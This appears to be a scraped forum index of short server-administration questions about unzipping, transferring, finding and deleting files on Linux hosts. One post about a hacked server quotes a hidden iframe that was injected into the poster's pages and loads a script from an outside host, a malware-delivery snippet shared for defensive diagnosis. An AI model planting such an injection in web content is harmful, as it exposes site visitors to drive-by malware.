How To Unzip Files On A Server

Apr 3, 2007

I want to know that is there any ftp program by which I can unzip files on my server.

View 3 Replies


ADVERTISEMENT

SSH Unzip Command Changes Files To Lower Case

Oct 4, 2008

I have a small issue that's probably easy to answer. If I upload a zip file to a Linux server, and run this command via SSH:

Code:

unzip -a name_of_zip.zip

Although it does unzip the directories as expected, it makes all file names and folders lowercase. This is a problem when trying to install software that relies on case sensitive names.

Does anyone know what command tells the server to retain the file names and not alter them?

View 1 Replies View Related

What Is Unzip

May 12, 2007

I want to install a script on my webspace, and I have to enter the path to unzip. But what is unzip? How could I find out the path?

View 1 Replies View Related

Unzip Greater Than 4294959102 Bytes

Oct 17, 2009

I have VPS with centos 5.3 installed ..

i tried to unzip zipped file of 5 gb but i got error

file greater than 4294959102 bytes

From the SSH i use unzip filename.zip

i do have enoght space more than 30GB ..

View 5 Replies View Related

/usr/bin/gzip -p Correct Option To Unzip First File To Second File?

Nov 22, 2008

I'm trying to do this

/usr/bin/gzip -p /home/mysite/public_html/shop/feeds/myfile.xml.zip > /home/mysite/public_html/shop/feeds/myfile.xml

But it just tells me

/usr/bin/gzip: invalid option -- p
X-Powered-By: PHP/5.2.5
Content-type: text/html

How do I find the correct option to unzip first file to second file?

View 8 Replies View Related

How To Tansfer Backup Files From Linux Server To Windows Server

Jul 4, 2007

what is the fast and best way?

View 4 Replies View Related

Server Hacked : How Can I Find Out How They Are Uploading Files To My Server

Apr 14, 2007

I am being hacked & I don't know how they are getting files on my server. They are doing it on two of my domains, I suspended one and then they got it on the other. My FTP access log does not show anything suspicious..

How can I find their doorway?

View 4 Replies View Related

Transfer Large Many Files From Server To Server

Oct 23, 2009

In reference to my previous post, i want to tranfer accross 7GB of data, approximatly 80,000 files i believe it is (due to a gallery script).

It's currently on another host (on a webhosting account) which uses their own control panel which has no options but to manage databases, the only way i can see to do this is via FTP but it'll take me days. I've tried using compressing and backup scripts, but the damn execution time on the hosts server is too low to allow the files to be zipped. Are there any ways? Can i login to my VPS via SSH and anyhow pull off the files from the other hosts server?

View 6 Replies View Related

Uploading Files To Server

Nov 9, 2009

Why is it that you can upload large file size when you are using FTP, but you cant upload large file size beyond the max when you are using browser to upload?

View 3 Replies View Related

How To Copy Files From One Server To Another

May 1, 2008

I have about 1.80GB of flash games and I want to copy this flash games to another server, I only want to copy the flash games not the entire account.

FYI I have shell access on both server.

View 5 Replies View Related

PHP Files Not Work On My Server

Apr 24, 2008

I have a dedicated server, on this server I have only 2 website.

I created an account before and that account work correctly.

now I created a new account and when I trying to run a simple php file show me "Internal Server Error".
I can view html files and I haven't .htaccess file .

Server Inofrmation:
CentOS , cPanel , Apache 2, PHP 5

View 11 Replies View Related

Files On The Server That Is Bigger Than 2gb

Jan 3, 2008

when I am trying to see any files on the server that is bigger than 2gb. I got something like this

find: /proc/29543/task/29543/fd/4: No such file or directory
find: /proc/31003/task: No such file or directory
find: /proc/31022/task: No such file or directory
find: /proc/31035/task: No such file or directory
find: /proc/31036/task: No such file or directory
find: /proc/31041/task: No such file or directory
find: /proc/31042/task: No such file or directory
find: /var/named/chroot/proc/29543/task/29543/fd/4: No such file or directory
find: /var/named/chroot/proc/31123/task: No such file or directory
find: /var/named/chroot/proc/31132/task: No such file or directory
find: /var/named/chroot/proc/31134/task: No such file or directory
find: /var/named/chroot/proc/31137/task: No such file or directory
find: /var/named/chroot/proc/31138/task: No such file or directory
find: /var/named/chroot/proc/31139/task: No such file or directory
find: /var/named/chroot/proc/31140/task: No such file or directory

View 5 Replies View Related

Transfer Files From One Server To Another

Sep 9, 2007

is there any soft for windows who can transfer files from one server to another? I have Shell access on both servers but dont know how to do that via shell..is there any GUI soft for windows where I can on one window see files from one server and on other to see files from second server?

View 3 Replies View Related

Text In All Files On Your Server

Apr 12, 2007

my whole site is secure and inside a secure folder and I am going to be moving the majority of the site over to a non-secure folder. but I need to find all the absolute links and change the https to http. I hope I dont have to check each page one by one.

so I was wondering if there was a way to search everypage on my server for any file containing "https"?

View 1 Replies View Related

Finding Files On Server Using SSH

Apr 29, 2007

Can someoen tell me the commands to

1) Find a specific file

2) File all files with a certain extension i.e MP3

Using SSH on a linux server?

View 5 Replies View Related

Server Files Transfer

Jan 10, 2007

Are there any good software that will backup current server files and restore them on a new server?

I'm looking for full backup, that would backup all the files in less time instead of going to each account's cpanel first and downloading backup than restoring it to new server.

View 4 Replies View Related

Multiple Server Accessing Files

Mar 28, 2009

I have one server right now and will be adding a second server in the next 4-5 months. In the meantime I've upgraded the coding in my community site to act as if there is already two servers. Mainsite.com has all the php files, and a separate HD for mysql db only, [url] has all the user images and videos.

This problem I'm having right now is the permission to delete files from [url]via [url]

What I've Tried:

vsFTPd - it has a small footprint but its not reliable, needed to be restarted a few times while testing on the beta site.

usermod - this is messy, changing chmods, owners, grps... etc I tried all of that but still had problems getting the Mainsite to be part of the group without having to change all the chmods and grps.

NFS mount - haven't tried yet...

Does anyone run a multiple server site? My sites pretty big been around for 4yrs, and i've upgraded servers 3 times since then.

If i can't get this to work right my final option would be to continue to upgrade to a new server each year, everytime a bigger and faster server setup becomes available.

Current server Dual Xeon 5310 4gb, 3 x 146gb scsi/sas. The server is doing fine with this setup. But with the new site uprade and features it's going to top things out. I can keep throwing ram on the server and move mysql off site.

The site has little over 1mil users with about 60-70% of them being active daily...

View 5 Replies View Related

How To Find Out Hacked Files On Server

Jul 10, 2009

My server was being hacked, I can find some HTML and PHP files which inserted the codes similar to the following by the hacker.

HTML Code:
<iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"><
/iframe>
The inserted iframe src is not the same among the hacked files.

I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?

View 14 Replies View Related

All Files Except RAR Are Courrupted After Download From Server

Jun 18, 2009

I'm running a remote dl site where user will request a file from various file sharing site like rapidshare and megaupload, and allow it to stream and dl. Few days ago everything was normal, but since yesterday all rar files download have corrupt name and sizes but when trying to extract it seems to be corrupted, zip files are running fine though.

View 1 Replies View Related

Transferring Files From Dedicated Server

Mar 25, 2008

What are our options for a secure and easy way to transfer files from our dedicated windows 2003 server to our local server? We want to create a job that transfers files twice a day from our dedicated server to our local machine.

View 2 Replies View Related

Ssh Code To Copy Files In Same Server

Jun 28, 2009

I want to my friend's files from /home/admin/dc
to /home/ as I am planning to rebuild kloxo for him, this could kill all the files so, I would like to know the code so tht I could copy few files from the above location to the home directory

View 4 Replies View Related

Eprohosted.com - Get My Files From Their Unstable Server

Apr 10, 2008

I have an account with eprohosted.com and host 40 website. the server is always down. I want to backup my data and move away from them. Nobody is respond to my tickets. What i can do in order to be able to get the latest site backup? Do i have to contact my lawyer?

Best Regards

Their support is really bad... and so their service. From my experience stay away from them.

it4coserver.com/eprohosted.com_support.png

View 6 Replies View Related

Decompressing Files On Remote Server Using SSH

Nov 5, 2008

I uploaded a .tar.gz file to my host & want to decompress it on the server to avoid long & painful FTP uploading. I read so far that this is possible using SSH with command line, but I searched for the appropriate command to no avail so far. SSH (& SFTP) connection to server established successfully & I'm using WinSCP.

View 4 Replies View Related

Internal Server Error For All Php Files

May 22, 2008

I switched over a new host and everything was working perfectly. I then uploaded one last directory but it had a weird internal server error when trying to access the index.php file. I then googled it and changed directory permissions to 755, and I am not sure if it is a coincidence but now every site on my server with php files displays that error but html pages are fine.

View 5 Replies View Related

Core Files Are Filing The Server

Mar 17, 2007

Now the core files for example (core.18920) files are filling the server, here is a shot

-rw------- 1 someuser somegroup 3.9M Mar 17 16:15 core.18920

all server account have that files, all users how running php files in there websites have the core.**** files and all websites quote are going to be excceded

I guess the problem from apache, i do rebuilf using whm, but the same problem

View 5 Replies View Related

Transfer Gzipped Files From 1 Server To Another

Jun 7, 2007

Could I Transfer Gzipped Files From 1 Server to Another?

I'm in the process of changing servers, and I was wondering if there was some sort of command where I Could transfer my backups to the new server?

View 7 Replies View Related

Can't Delete Files From CPanel Server

May 11, 2007

I've been using CPanel for a few years now and I've encountered an error that I have no clue how to fix it. Basically the files have been with me for the last two or three years and I've changed them from server to server. I'd say these files have been through about four or five servers. The funny thing is I can't delete any of these files. The files are in a folder under public_html and I can't delete the folder or any of the files or folders inside of that folder. I've tried through FTP and through CPanel.

The FTP error I get (I'm using WS_FTP Pro) is:

# transferred 4277 bytes in 0.063 seconds, 534.625 Kbps ( 66.828 Kbps), transfer succeeded.
226-Options: -a -l
226 58

The CPanel error I get (through File Manager) is:

[a fatal error or timeout occurred while processing this directive]

and under the trash can in File Manager:

Unable to change directory to /home/mydirectory/.trash! You do not seem to have access permissions! (System Error: Permission denied)

I even CHMODed all of the files to 777. I don't know how to get rid of these old files, how do I do it? I also have root to the server if that helps.

View 3 Replies View Related

Downloading Files From Hosting Server

Dec 22, 2007

I was asked to redesign one web site. Nothing much complicated. I've got username and pass to hosting provider. Now I can see the files of web site that are already there but how can I download them because only upload seems to be possible. And if so why is that so?

View 6 Replies View Related

Getting Files Off The Root Server That Is Outside Web Access

Aug 15, 2007

I am actually very inexpirience in server management. I have a small - I believe - problem. I need to get config file onto my computer from my root server. I can access it through terminal, but it is not very confortable. The config file is on root server.

the file is located at //etc/xxx.conf

Do I need to use web browser to do it? If so how?

Or is there a way that I log to my root server through ssh and transfer onto my computer?

View 2 Replies View Related

How To Access MYISAM Files In My Server

May 24, 2007

1. If I recompile my mysql, can that potentially harm any of my database / table / data?

2. Here is a list of files. [url]. I guess, I have the same in my server. Any idea how can I access to these files?

Here is what I got -

root@usr [/]# find myisam
find: myisam: No such file or directory

View 13 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved